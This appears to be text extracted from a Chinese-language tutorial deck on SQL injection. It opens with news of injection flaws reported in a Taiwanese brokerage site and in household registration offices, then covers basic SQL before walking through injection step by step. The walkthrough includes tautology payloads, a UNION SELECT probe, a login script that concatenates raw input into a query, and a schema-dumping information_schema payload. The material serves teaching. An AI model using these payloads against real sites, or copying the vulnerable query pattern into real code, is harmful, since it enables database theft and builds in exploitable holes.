中國漏洞通報平臺烏雲(WooYun)在3月3日下午3點57分公佈,日盛證券網站因為有SQL Injection(隱碼攻擊)的漏洞,導致有數億筆的資料外洩。受託回報的臺灣HITCON ZeroDay漏洞通報平臺窗口翁浩正表示,在當天下午已經立即轉告日盛證券相關漏洞資訊,態度相當正面,預料應該正在著手修復中。
中國的網路漏洞回報平台烏雲網回報了一個令國人很值得注意的漏洞,內容是台灣的戶政事務所被查出有4處SQL Injection漏洞,危害等級被評為「高」,雖然這則新聞在新年的氣氛之下被沖淡了,但是由於戶政事務所的資料影響相當大,嚴重到可能與選務有關,還是有很多人相當關心。
SELECT - 取得資料庫已存在資料
SELECT username FROM account WHERE uid=1;
從 account 這個表格中取得 uid 為 1 的 username
UPDATE - 更新資料庫已存在資料
UPDATE account SET username='hrj' WHERE uid=1;
從 account 這個表格中將 uid 為 1 的 username 修改為 hrj
INSERT - 新增一筆資料給資料庫
INSERT INTO account (username) VALUES ('hrj');
新增一筆 username 為 hrj 的資料進 account 資料表裡
DELETE - 刪除資料庫已存在資料
DELETE FROM account WHERE uid=1;
將 uid 為 1 的資料從 account 資料表中刪除
SQL
Web Server:
news.php?id=3
Result:
ID NAME CONTENT DATE
1 電視黑客 hrj 出沒台科 ... 2016/10/27
2 世紀黑黑莫風驚現聖約翰 ... 2016/11/20
SQL:
SELECT * FROM `news` WHERE id=3
3 濕冷中部以北高溫驟降7度 ... 2016/11/27
Web Server:
news.php?id=3
Result:
ID NAME CONTENT DATE
1 電視黑客 hrj 出沒台科 ... 2016/10/27
2 世紀黑黑莫風驚現聖約翰 ... 2016/11/20
SQL:
SELECT * FROM `news` WHERE id=3
3 濕冷中部以北高溫驟降7度 ... 2016/11/27
Web Server:
news.php?id=3'or'1'='1
SQL:
SELECT * FROM `news` WHERE id=' '
Result:
ID NAME CONTENT DATE
3'or'1'='1
1 電視黑客 hrj 出沒台科 ... 2016/10/27
2 世紀黑黑莫風驚現聖約翰 ... 2016/11/20
3 濕冷中部以北高溫驟降7度 ... 2016/11/27
Web Server:
news.php?id=3'or'1'='1
SQL:
SELECT * FROM `news`
WHERE id=' '
Result:
ID NAME CONTENT DATE
2 and 1=2 union select 12, 34, 56, 78
12 34 56 78
$user = $_POST['user'];
$pass = $_POST['pass'];
$sql = "SELECT * FROM `account` WHERE
username='$user' AND password='$pass';
$sql = "SELECT * FROM `account` WHERE
username=' ' AND password='$pass';
1' or '1'='1’;--
SELECT * FROM `account` WHERE username='1'or'1'='1';
(SELECT @ FROM (SELECT @:=0,(SELECT @ FROM information_schema.columns WHERE @ IN (@:=CONCAT(@, 0x0a,concat_ws(0x3a,table_schema,table_name,column_name))) ) )x)